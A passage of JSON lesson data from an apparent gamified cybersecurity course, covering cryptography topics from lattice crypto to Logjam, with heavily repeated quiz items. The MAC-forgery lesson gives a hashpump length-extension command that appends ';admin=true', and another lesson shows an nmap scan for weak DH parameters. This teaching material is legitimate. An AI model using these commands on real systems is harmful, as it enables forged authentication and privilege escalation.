prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1}]},{"id":"cr-lattice-crypto","cat":"Cryptography","title":"Lattice-Based Cryptography","diff":5,"xp":300,"intro":"The math behind post-quantum crypto: shortest vector and learning with errors.","sections":[{"type":"text","content":"Lattice problems (SVP, LWE) are believed hard even for quantum computers. Kyber/ML-KEM uses Module-LWE for key exchange. Security comes from the difficulty of finding short vectors in high-dimensional lattices."},{"type":"code","lang":"bash","content":"# Learning With Errors (LWE):\n# Public: A (random matrix), b = A*s + e (s=secret, e=small error)\n# Hard problem: recover s from (A, b)\n# Kyber: Module-LWE variant\n# Key sizes: Kyber-512 (800B public key) vs RSA-2048 (256B)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Lattice-based crypto resists quantum computers because...","opts":["It uses larger keys","No known quantum algorithm efficiently solves lattice problems","It's faster","It uses hashing"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-merkle-tree","cat":"Cryptography","title":"Merkle Trees and Hash Chains","diff":2,"xp":150,"intro":"Build tamper-evident data structures using hash trees.","sections":[{"type":"text","content":"A Merkle tree hashes pairs of data blocks, then hashes those hashes, up to a single root hash. Changing any leaf changes the root. Used in blockchain, git, and certificate transparency."},{"type":"code","lang":"bash","content":"# Merkle tree structure:\n#        Root = H(H12 + H34)\n#       /                  \\\n#   H12 = H(H1+H2)    H34 = H(H3+H4)\n#   /                 /      \\\n# H1=H(D1) H2=H(D2) H3=H(D3) H4=H(D4)\n# Changing D1 changes H1, H12, and Root"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"A Merkle tree detects tampering because...","opts":["It encrypts data","Changing any leaf changes the root hash","It uses signatures","It compresses data"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1}]},{"id":"cr-shamir-secret","cat":"Cryptography","title":"Shamir Secret Sharing","diff":3,"xp":200,"intro":"Split a secret into N shares where any K can reconstruct it.","sections":[{"type":"text","content":"Shamir's scheme uses polynomial interpolation: the secret is the constant term of a random degree K-1 polynomial. K points determine the polynomial; fewer reveal nothing."},{"type":"code","lang":"python","content":"# Shamir (2,3) scheme: need 2 of 3 shares\nfrom secrets import randbelow\np = 257  # prime\nsecret = 42\na1 = randbelow(p)  # random coefficient\n# f(x) = secret + a1*x mod p\nshares = [(x, (secret + a1*x) % p) for x in range(1,4)]\n# Any 2 shares reconstruct via Lagrange interpolation"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Shamir's scheme ensures K-1 shares reveal...","opts":["Half the secret","Nothing about the secret","The polynomial degree","The prime"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1}]},{"id":"cr-entropy-analysis","cat":"Cryptography","title":"Entropy Analysis for Crypto Assessment","diff":2,"xp":150,"intro":"Measure randomness to detect weak crypto and packed malware.","sections":[{"type":"text","content":"Shannon entropy measures information density. Random data (encrypted/compressed) has entropy near 8 bits/byte. Low entropy = patterns. Useful for detecting encryption vs encoding."},{"type":"code","lang":"bash","content":"# Calculate entropy\npython3 -c '\nimport math, collections\ndata = open(\"file\",\"rb\").read()\nfreqs = collections.Counter(data)\nentropy = -sum((c/len(data))*math.log2(c/len(data)) for c in freqs.values())\nprint(f\"Entropy: {entropy:.2f} bits/byte\")  # 8.0 = random\n'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"High entropy (near 8.0) in a binary suggests...","opts":["Normal code","Encrypted or compressed content","Debug symbols","ASCII text"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-mac-forgery","cat":"Cryptography","title":"MAC Forgery Attacks","diff":4,"xp":250,"intro":"Forge message authentication codes when the construction is flawed.","sections":[{"type":"text","content":"Length extension on hash(key||message), CBC-MAC forgery on variable-length messages, and polynomial MAC key recovery from nonce reuse."},{"type":"code","lang":"bash","content":"# Length extension: given H(key||msg) and len(key)\n# Can compute H(key||msg||padding||extra) without knowing key\nhashpump -s original_mac -d 'original' -a ';admin=true' -k 16\n# CBC-MAC variable length: MAC(A) XOR MAC(B) = MAC(A||stuff)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Hash length extension works against...","opts":["HMAC","hash(key || message) with Merkle-Damgard hashes","Authenticated encryption","Digital signatures"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1}]},{"id":"cr-rng-weaknesses","cat":"Cryptography","title":"Random Number Generator Weaknesses","diff":4,"xp":250,"intro":"Weak RNG breaks all crypto that depends on it.","sections":[{"type":"text","content":"Predictable RNG: PHP rand(), Java Random (48-bit LCG), Python random (Mersenne Twister \u2014 not crypto-safe). Predicting the RNG predicts keys, nonces, tokens."},{"type":"code","lang":"python","content":"# Mersenne Twister (Python random) is predictable\n# After observing 624 outputs, the internal state is fully recovered\nimport random\n# Recover state from outputs\nobserved = [random.getrandbits(32) for _ in range(624)]\n# Now predict all future outputs\n# ALWAYS use: secrets.token_bytes() or os.urandom()"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Python's random module is unsafe for crypto because...","opts":["It's slow","Mersenne Twister state can be recovered from 624 outputs","It uses too much memory","It produces biased output"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-aead","cat":"Cryptography","title":"Authenticated Encryption (AEAD) Constructs","diff":2,"xp":150,"intro":"Encrypt and authenticate in one operation \u2014 the modern standard.","sections":[{"type":"text","content":"AEAD: AES-GCM, ChaCha20-Poly1305, AES-CCM. Provides confidentiality + integrity + authenticity. Associated data (headers) is authenticated but not encrypted."},{"type":"code","lang":"bash","content":"# AEAD: Authenticated Encryption with Associated Data\n# AES-256-GCM: fastest with AES-NI hardware\n# ChaCha20-Poly1305: fastest in software (mobile)\n# Both protect against tampering (unlike CBC alone)\nopenssl enc -aes-256-gcm -in plain.txt -out cipher.bin -K key -iv nonce"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AEAD provides...","opts":["Only encryption","Encryption + integrity + authenticity in one operation","Only authentication","Only compression"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1}]},{"id":"cr-dh-logjam","cat":"Cryptography","title":"Logjam Attack on Diffie-Hellman","diff":3,"xp":200,"intro":"Precomputation against common DH groups makes 512/1024-bit DH breakable.","sections":[{"type":"text","content":"Logjam: many servers reuse the same DH prime. Precomputing the discrete log for that prime (nation-state cost) breaks all connections using it. Use 2048+ bit DH or ECDH."},{"type":"code","lang":"bash","content":"# Check if server uses weak DH\nnmap --script ssl-dh-params target.com\n# Vulnerable if: DH parameter < 2048 bits\n# Or if using common/default primes\n# Fix: use ECDHE (elliptic curve) or DH with custom 2048+ bit primes"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Logjam exploits servers that...","opts":["Use AES","Reuse common small DH primes (precomputation breaks them)","Use RSA","Use ECDH"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key 